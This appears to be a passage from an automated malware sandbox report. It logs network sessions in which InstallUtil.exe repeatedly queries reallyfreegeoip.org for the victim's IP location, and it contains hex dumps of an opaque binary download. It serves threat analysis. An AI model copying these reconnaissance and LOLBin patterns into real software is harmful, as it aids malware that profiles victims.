2024-10-28 18:04:27 UTC	1161	IN	Data Raw: b5 30 53 71 d9 b0 bb e6 c7 4f 73 de a1 77 c2 18 46 1d 6f 68 a7 c7 29 fd 10 02 98 2c 17 85 15 8b 81 3e 15 09 00 75 9b 2a 19 c5 15 44 cd 97 d8 ff 5f d3 7a 5a 8b 3a a2 07 a4 29 f8 58 62 bd e7 7c 04 36 99 9a 2d f1 ce 35 2d a6 01 13 1f 59 dd 49 7c a8 cc c8 e8 51 80 85 68 2f de 35 f5 a4 f0 fa bb c1 6b f4 53 5a b1 19 cb a2 be 15 db 2c db 4d 24 ce fc 77 79 48 1d 83 07 95 d4 8b da 84 af cc 64 d1 58 81 2b f5 9f ff 71 29 d0 79 e3 d1 c2 89 0e ed 00 3a 4b a9 36 5e 64 96 b1 50 6d 69 c0 11 6e 9d b4 9e ad f6 3e 5b 9f 95 6c 5a da 79 49 3e df 83 0c a2 df 36 c0 cb 85 2e df cc 50 ba 0f 0d 19 08 11 e9 70 fc 97 a9 f0 b2 35 db 8a 3f e3 73 17 ce a7 e0 f4 67 14 1e a1 72 44 0b 3b 22 21 15 01 ac 2e 47 48 06 4c 8b ed 89 32 a4 ee a5 03 50 1f e6 b3 e2 79 d0 19 16 7b 5b 4b 4e d4 76 d2 Data Ascii: 0SqOswFoh),>u*D_zZ:)Xb\|6-5-YI\|Qh/5kSZ,M$wyHdX+q)y:K6^dPmin>[lZyI>6.Pp5?sgrD;"!.GHL2Py{[KNv
2024-10-28 18:04:27 UTC	14994	IN	Data Raw: be e3 ec a7 b9 f8 32 5a be cc 3c fb e7 d4 7a 70 1a 64 8a 6f 3a eb 96 16 e5 7d d8 80 42 c6 60 0d 4e 81 14 73 0e af c5 3c f0 d3 fd 30 cb fc e0 cd 79 8a 50 49 30 d1 db d9 14 a7 90 50 ed e6 f8 9e 65 24 db 62 7d 08 c6 78 61 2d 13 e7 6d 35 59 db bb ad 0a 82 76 b3 88 22 00 7d 06 0e ab 33 d3 56 65 eb 76 8f 1e 37 e1 f1 58 d1 5a 57 0d a4 22 dc bb 93 3b d7 60 c0 8f 5b 72 84 f0 8d 32 2e c8 9b ac 7b 9b 1a 52 14 9a ad 81 7b 96 fc 2b be ad 0f c1 45 79 a7 70 dc e8 26 25 de 8a a6 e4 81 2b 65 b1 d5 5b 24 58 b7 ec 3e 35 d7 6d 71 7b 53 28 0c 9c 61 29 6f a0 2d e4 97 d2 6a 27 82 1d cb 72 8f 47 32 06 f4 63 1e f0 14 86 98 b9 4f da f9 b4 79 a7 a3 72 c5 24 c7 5c 43 38 6f e1 08 82 ae db 71 00 f6 57 cd dc 84 d0 81 1c 3b 69 b1 b3 d4 3f 69 9c 72 9f 6c 09 5e 16 42 7f 9f 03 7f 87 09 c0 Data Ascii: 2Z<zpdo:}B`Ns<0yPI0Pe$b}xa-m5Yv"}3Vev7XZW";`[r2.{R{+Eyp&%+e[$X>5mq{S(a)o-j'rG2cOyr$\C8oqW;i?irl^B
2024-10-28 18:04:28 UTC	16384	IN	Data Raw: a4 58 c8 f1 a8 fc c0 5b 9d 3c b7 ad 06 4d 46 9d 6a 4e ca ff 5c b1 8c dc 36 91 62 87 0d 71 ed 4c c0 af 30 1d 2f e0 b4 75 40 da 3a 88 2e 87 1d 3f 18 c3 90 1e 45 5f 17 6d 49 9f d4 56 7e 53 bd 65 3b a3 8b 92 63 78 e1 56 62 3e 87 c1 ed 2c 75 a1 16 b1 cc 48 9e dd 7b be b1 5c 19 b9 dd ae 54 9b 06 dd ba be ef 7a e7 e2 d5 4e 56 f7 8f 8d c1 9e 95 b9 8b 0b 41 78 21 5f 36 87 cd de 41 6f 43 e1 d4 b2 ea 44 6c df 85 50 76 24 da 51 e9 d7 1b 8a 94 4b 66 04 7f 6f bd 6c 13 cd b9 11 ec 28 b2 ed 9f 54 a9 07 7b bf 5d 73 3e a1 3f 97 76 50 fa 93 5c 5c 94 47 ba 7d 86 fb ea 36 24 c6 81 5e 36 f3 0c 48 0d 4c d6 62 05 d6 b3 d3 2b ab 05 cd ba ae e0 11 c3 3b 57 36 c5 7c cc 70 0c 06 cd 30 af 74 92 31 6c e1 9a e8 5b f3 98 00 3b c1 2d 66 47 45 3a 0b 89 d5 7b 3a df b0 7a ad 1f 30 12 a0 5f Data Ascii: X[<MFjN\6bqL0/u@:.?E_mIV~Se;cxVb>,uH{\TzNVAx!_6AoCDlPv$QKfol(T{]s>?vP\\G}6$^6HLb+;W6\|p0t1l[;-fGE:{:z0_
2024-10-28 18:04:28 UTC	16384	IN	Data Raw: 4d 3a a3 6f 8e e5 2a 7f 65 47 79 82 88 a2 34 4e da 9f 60 31 0f a0 2b 09 b3 25 33 ff ab 46 84 d0 4f 2d b2 bf db 1f cb c7 34 ef 6e 97 b6 a9 d2 4f f7 66 60 cc ee bd 9a d3 07 b8 ea 28 91 11 05 90 0e e6 7e 7f 5c d5 0d 3f 5d f2 ce d3 33 4e f4 14 84 0b e1 7a d7 ac 23 f4 d2 c8 5d f2 a8 8c e4 96 98 9d 67 32 62 4a 6c ee 1d ad 35 47 69 4a 8b 3f 22 d0 5c b2 b4 9b 62 4a 91 0c dc 63 76 a3 5f 60 e0 3a 8f 03 c6 81 f7 f6 75 a6 50 38 85 a3 b3 5b 60 93 0b 7d ad 79 4d 6d 8d 00 e9 7c 38 38 83 91 03 ea b7 76 c0 32 3f 99 c3 b6 b6 66 be 32 28 50 c6 9c db fa 0d e1 5b fe 80 66 b7 0f 4f 54 9d bc fb 3c b5 c8 d6 26 5f 31 3b cf 24 da f2 c5 67 28 1e 9b c6 78 1c 69 ea 08 21 ae ad c9 a4 88 d3 60 77 82 1e c4 6d 4d b4 8a f1 c4 46 7d 5f f0 5e cc 3c 1c c4 c0 61 99 85 c1 a9 16 3b 02 d2 a2 9c Data Ascii: M:o*eGy4N`1+%3FO-4nOf`(~\?]3Nz#]g2bJl5GiJ?"\bJcv_`:uP8[`}yMm\|88v2?f2(P[fOT<&_1;$g(xi!`wmMF}_^<a;
2024-10-28 18:04:28 UTC	16384	IN	Data Raw: 34 37 4f 75 a6 43 08 37 1e 33 b5 aa f5 c8 09 53 39 55 c5 a8 89 7b ab 10 92 03 34 e1 4f d1 0b 7d 74 cc 5f 2e 1b 2d ef af c1 e1 98 76 5f 9c b9 0a 73 ad 29 e3 71 12 8d 96 5a 04 07 40 94 10 31 f9 5d f3 e2 25 ab 7f f1 74 84 93 0b da e5 d1 1c 70 7a 6c 01 2f 82 28 30 2b 4b ae ee 31 60 01 8e 5a e1 bc d8 53 0f ab 42 47 fb a8 e1 2a df fd b8 9b 34 f8 f6 2b 0e a9 4d 2b 5f bd be bd a4 30 c1 fb 11 06 41 fc 0c 74 b8 aa d3 d9 0e 3e 67 f1 77 d5 db 60 fa 71 f2 19 2e d1 cb 41 58 3f 89 54 eb 8e 42 de 25 9b ab 78 0b 9e 2c db 62 8c 7f 16 bb cf 45 19 d1 e1 f0 dc ad 62 ab 5f db ce 71 22 da 61 73 16 d0 a8 aa bf b3 bc d3 28 03 89 21 72 4c 81 a4 04 90 34 9c af 05 e0 2e f6 46 21 ea d7 24 4a 20 90 5a f8 e9 9a bd d9 ff f4 5c 55 df 74 7e f1 3c 89 22 58 43 a7 a0 dd e3 fd df 15 4e 68 2e Data Ascii: 47OuC73S9U{4O}t_.-v_s)qZ@1]%tpzl/(0+K1`ZSBG*4+M+_0At>gw`q.AX?TB%x,bEb_q"as(!rL4.F!$J Z\Ut~<"XCNh.
2024-10-28 18:04:28 UTC	16384	IN	Data Raw: b3 99 9c 12 e2 55 9e 5c a2 c3 f2 4e c0 9f f3 ad 34 54 ec cc f5 a7 61 bf 41 ed 84 ce 3d 00 84 2b b8 9b c7 be 66 ae 8c c7 23 5e ea 54 9b e0 2e a5 20 e5 fe e4 70 95 e7 a2 38 08 f8 61 bd 7e 09 56 25 4e 69 3b 01 ee 6b 59 78 70 15 0a 92 95 45 a7 99 23 51 4b c8 c7 23 0e 33 b6 21 ba 70 ec 79 fe e0 47 38 52 0a d0 75 e2 08 69 9e 63 98 38 ca 79 b7 11 e7 44 f7 7e 3a b4 76 25 88 a9 e4 be 62 68 d1 85 12 78 ee a3 93 c3 f9 12 71 80 f1 3f 68 63 3e 62 42 42 b8 e2 19 7c f9 42 90 cc 73 04 e5 88 89 a4 22 61 4f c4 08 74 23 30 75 42 61 17 db de ec 9f d5 42 0d 76 a7 b1 1f c7 1c e5 94 93 54 f6 24 ed 46 b8 32 d6 49 ed da d4 8a 28 98 f9 72 ff d8 d9 64 ab 4c 5b 55 b7 9d 74 db 43 19 b5 11 d8 1c 5b ca 23 32 0a bb 49 5c 25 40 37 cf 37 ee c2 16 df e0 fe ab 4e 04 61 2e b6 3c bc c6 17 db Data Ascii: U\N4TaA=+f#^T. p8a~V%Ni;kYxpE#QK#3!pyG8Ruic8yD~:v%bhxq?hc>bBB\|Bs"aOt#0uBaBvT$F2I(rdL[UtC[#2I\%@77Na.<
2024-10-28 18:04:28 UTC	16384	IN	Data Raw: 2c 03 61 71 f9 7d 79 1b b7 a7 29 5f c2 28 26 1e 6b d7 c1 1c a5 9e 95 88 7e 2a 21 5a ce fb ad 29 4d b5 ec dd 33 97 ce b7 28 88 b1 aa 4e 30 b8 89 2c 2f 96 b5 67 63 98 b6 7b 7d c9 4a e5 01 bc c1 1e 24 f1 2a 1c fe e8 e1 82 5f d3 f5 4e 3e a8 97 9f dd f7 54 02 cf ab dd 62 59 e0 43 eb 63 e7 95 d0 b4 c4 71 d5 08 d5 b4 80 42 a8 34 11 d9 3e dd d9 e5 9f 79 46 31 b6 28 cd b2 97 95 5c 1c 16 80 3f f6 fe 86 e1 56 25 d0 b2 df 40 be 12 af 21 71 ea fa 69 17 94 db c1 2e 97 cd 3d 3b 66 15 e0 9c ed ef da f4 eb 16 f4 9b 86 1c b8 43 77 59 95 9b 1c c2 2e 77 9b b5 e5 b4 f5 a8 d5 bc e1 eb 56 76 27 7f a4 d9 51 bc 3a 83 cf 74 ea ae 70 dc 4e 00 24 87 87 c9 9c b8 57 d8 f7 1b 6f 83 ab 65 a2 69 d9 ee 68 9c 21 9f b5 d1 fc e5 04 cf 4b 1d 85 7a 3b 74 1e bf 0f 47 6f e9 dc 86 0a a7 75 e3 dd Data Ascii: ,aq}y)_(&k~!Z)M3(N0,/gc{}J$_N>TbYCcqB4>yF1(\?V%@!qi.=;fCwY.wVv'Q:tpN$Woeih!Kz;tGou
2024-10-28 18:04:28 UTC	16384	IN	Data Raw: 9e f7 8b 10 41 1e 06 e2 09 dc eb 87 57 48 73 f6 96 c6 1a 6a f7 7e 5f 13 2c 66 de 96 a1 5b a8 54 5b 3d 5a 47 08 4b 5f af 0d 33 6a a3 1a 8e e5 dd ee ee 4c 12 79 4a 92 a8 52 e5 72 37 54 89 6d 34 1c 16 76 ce 29 dd 44 4b 40 1c 9d 23 18 f1 78 a4 b4 38 9f b3 ed 8c a9 59 9d f5 08 56 fd ac be 9f 1c aa 8a fe 2b f9 c2 7b 70 73 9e 20 3b 23 d9 f5 0b 99 b1 0a 78 46 af 54 4e 28 16 76 69 38 26 4e 04 56 46 e1 cf 29 6f 84 61 25 dc ff 1c 6b 29 c3 90 64 05 a1 06 5f 6f 1b 06 4c a4 f2 ab b6 9e 4c b5 59 6b 9c 79 57 13 26 0e 83 79 aa 1a 16 6d 7a 85 1d b3 0b 98 66 03 d9 18 ac c5 1b 73 01 7d 90 e9 d9 9d 97 f1 a6 58 57 c5 ef 9d 93 45 e2 b0 77 09 4a 0d 21 a8 b4 e9 7e 33 b5 6d 73 ba 6c 8b 26 b2 11 2e e6 ac 3f 0b d7 d7 60 33 05 d7 5f 5b 14 61 16 81 02 c3 f5 77 c4 c4 1a 03 5e 22 a6 29 Data Ascii: AWHsj~_,f[T[=ZGK_3jLyJRr7Tm4v)DK@#x8YV+{ps ;#xFTN(vi8&NVF)oa%k)d_oLLYkyW&ymzfs}XWEwJ!~3msl&.?`3_[aw^")
2024-10-28 18:04:28 UTC	16384	IN	Data Raw: b4 d2 c6 06 dc 9e 98 14 4e 7b 2c a0 ee 0f 35 14 f0 cd bd fa 00 6f 7e f3 ce cd 33 f3 07 60 36 ad 8a f2 4b aa 02 01 eb 72 1a 98 c4 44 70 12 bf 82 4a 64 2b d0 31 6f 45 10 b8 4f 82 8d 76 0d 1d 25 47 45 4c 59 a9 42 16 f3 e8 e8 f4 2e 8b de 89 9d 13 27 a4 1e cb 0f 2b c9 c2 4c 04 9f 11 bc 9b ff 49 87 e5 91 21 bc 6c 26 9f fb 34 c0 d2 9f a4 fe bc 9e e5 e6 ed d4 15 12 dc 31 33 6c 3c 2e aa 24 a1 f0 9a 17 47 80 b1 92 1d 6f 64 97 1b 01 bd 0f 39 2a 71 a4 7e 3e b0 b3 15 1d 28 21 a9 3e 8e e1 d5 fc 35 7a 5d ee 40 d0 5d f5 48 d1 0c 81 1e 89 1d 95 ff 68 e8 32 f6 4d 8d c3 5a 88 dc e8 da cc 46 86 6b dc 8f d8 37 f3 96 d1 80 8a e8 e8 ec e7 67 07 b3 fb b8 64 bb c4 23 aa a8 87 bd 59 b5 aa c9 18 28 ea 11 d7 7d f6 7c 4c 1f ec 8f 7b 19 00 61 a4 4d 7a f0 bd 9b 50 20 75 32 06 63 22 d1 Data Ascii: N{,5o~3`6KrDpJd+1oEOv%GELYB.'+LI!l&413l<.$God9*q~>(!>5z]@]Hh2MZFk7gd#Y(}\|L{aMzP u2c"
2024-10-28 18:04:28 UTC	16384	IN	Data Raw: 68 98 88 bc 56 7a 98 5e f1 bc 5e 61 5b 4d 89 4e b1 5f ec 15 06 bf ac 40 cd b4 9e 7a 2f b2 34 97 a8 21 22 c5 df f4 b3 bf 68 5b da 26 aa bb 33 65 12 c9 e3 d2 ce 66 e7 83 94 2d 50 5b eb 9d 31 30 ce 12 b3 bf 4d e5 cf e8 0c 04 94 48 1c ba d0 31 71 af c1 04 5b e3 7d e6 68 22 ce 41 2e 58 ce 6a e5 ab 78 3c b3 47 93 82 44 3b ad 02 9f 1e ba 11 6e a6 19 8e c8 41 10 23 1e 5a 87 73 55 ea d9 b6 72 9b 59 07 28 2c 2d fd dd d9 7a 29 c3 4c 40 f8 40 a1 0d e7 38 ed d3 bc be c8 26 a0 f8 85 45 d5 3b 64 c4 1f 6a 4b 9c fb d9 17 a3 e6 b4 c9 73 d7 99 30 6c cb d1 78 a3 58 f3 ba c5 6f 8c 9c 38 c0 1a 52 61 d4 56 1e cb 23 4d 48 41 9d e8 4f 60 eb 0d bd a6 dc b1 1a 70 47 bd a7 38 b9 8d 9c ac 19 96 08 39 2c 4d 44 fb ad 0c 66 e1 5f 99 43 3b d8 ec 0d d1 07 18 8e d6 72 69 36 72 55 13 59 05 Data Ascii: hVz^^a[MN_@z/4!"h[&3ef-P[10MH1q[}h"A.Xjx<GD;nA#ZsUrY(,-z)L@@8&E;djKs0lxXo8RaV#MHAO`pG89,MDf_C;ri6rUY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49748	188.114.97.3	443	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:27 UTC	63	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-28 18:04:27 UTC	887	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:27 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVwB0hEZPHcEJng= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 55328 Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xfvCMS3A2L6inN1tEMrL%2BI%2BmhOyZunhnFn5VEufpRFPGgq3QhYYbTWEsahl5Fm2n395X9PwkqJGp3J2FGZFjUCliWuyQteq6G8%2F3OdyvhJGNu7VB6kDik6F%2BfCJ2mLzKd%2Fb5%2FJDz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd9303a8d676f-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19878&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=145534&cwnd=32&unsent_bytes=0&cid=104b88ca2bbf50e3&ts=178&x=0"
2024-10-28 18:04:27 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	188.114.97.3	443	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:29 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 18:04:29 UTC	883	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:29 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVwB0hEZPHcEJng= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 55330 Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1XKRr29nKqJaV4E550zNNKZv7Jio9mLuxu%2F9yKnpYxh%2FJx68B2XGHHoqiFt32UGAxKUiIvFhG617fXS7QY9aMXM%2BFVzvbSzWAjU5hXwcv%2B0CJ4pgo0Aoq7VzKPCoHmxozh1e3erJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd93afdfe44f9-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20095&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=143515&cwnd=32&unsent_bytes=0&cid=3dd8ba0159645196&ts=169&x=0"
2024-10-28 18:04:29 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49754	188.114.97.3	443	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:35 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 18:04:36 UTC	881	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:36 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVwB0hEZPHcEJng= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 55337 Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RjeTokSlvjWpqrqmPpkZI6TjyH0Rs2Ihk2TSJd8B9J5F9yXXBNUhH9wpTogTFB3d00ixbXaQ5UaaBwAsNDzdkjUhGnBaRe0%2F2X%2Br6u7zpPw4qUD98KJqJQfW68OyYreR%2F9KF8OLZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd964fd7e4529-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17923&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=160888&cwnd=32&unsent_bytes=0&cid=67f766094e5a9513&ts=222&x=0"
2024-10-28 18:04:36 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49755	188.114.97.3	443	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:36 UTC	63	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-28 18:04:37 UTC	883	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:37 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVwB0hEZPHcEJng= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 55338 Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kixL%2Bz8863xSci5iMrd0SVdD2CHgXMQHzy%2Fexp5jClQgaTjJC5gZFC2WVtdQbza3gwPIs%2BXNs588UaANP1mTulJQyJJLivsUCcCb353C6b1atSEXqAjrARH%2FqDUzCWhY1I4IsqXp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd96bad5abfff-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20142&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=143600&cwnd=32&unsent_bytes=0&cid=df3e8dd42bd10b3e&ts=174&x=0"
2024-10-28 18:04:37 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49757	188.114.97.3	443	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:38 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 18:04:38 UTC	879	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:38 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVwB0hEZPHcEJng= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 55339 Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1eUh4SgKbJdJiDcFu0xJCk7E9xo9euCta83ac7A%2FtUy7klvTWyshSdlBAtZHoMSS1ocIYKzZ8hRPiWGN5a%2BnUaKjrUtd57qkaUTk5vWwZ2rGpbxwNA3QWWtsBNYBzTFM1dPeX4c0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd9763b37bd62-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17974&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=161616&cwnd=32&unsent_bytes=0&cid=ca05817e1c24f775&ts=170&x=0"
2024-10-28 18:04:38 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 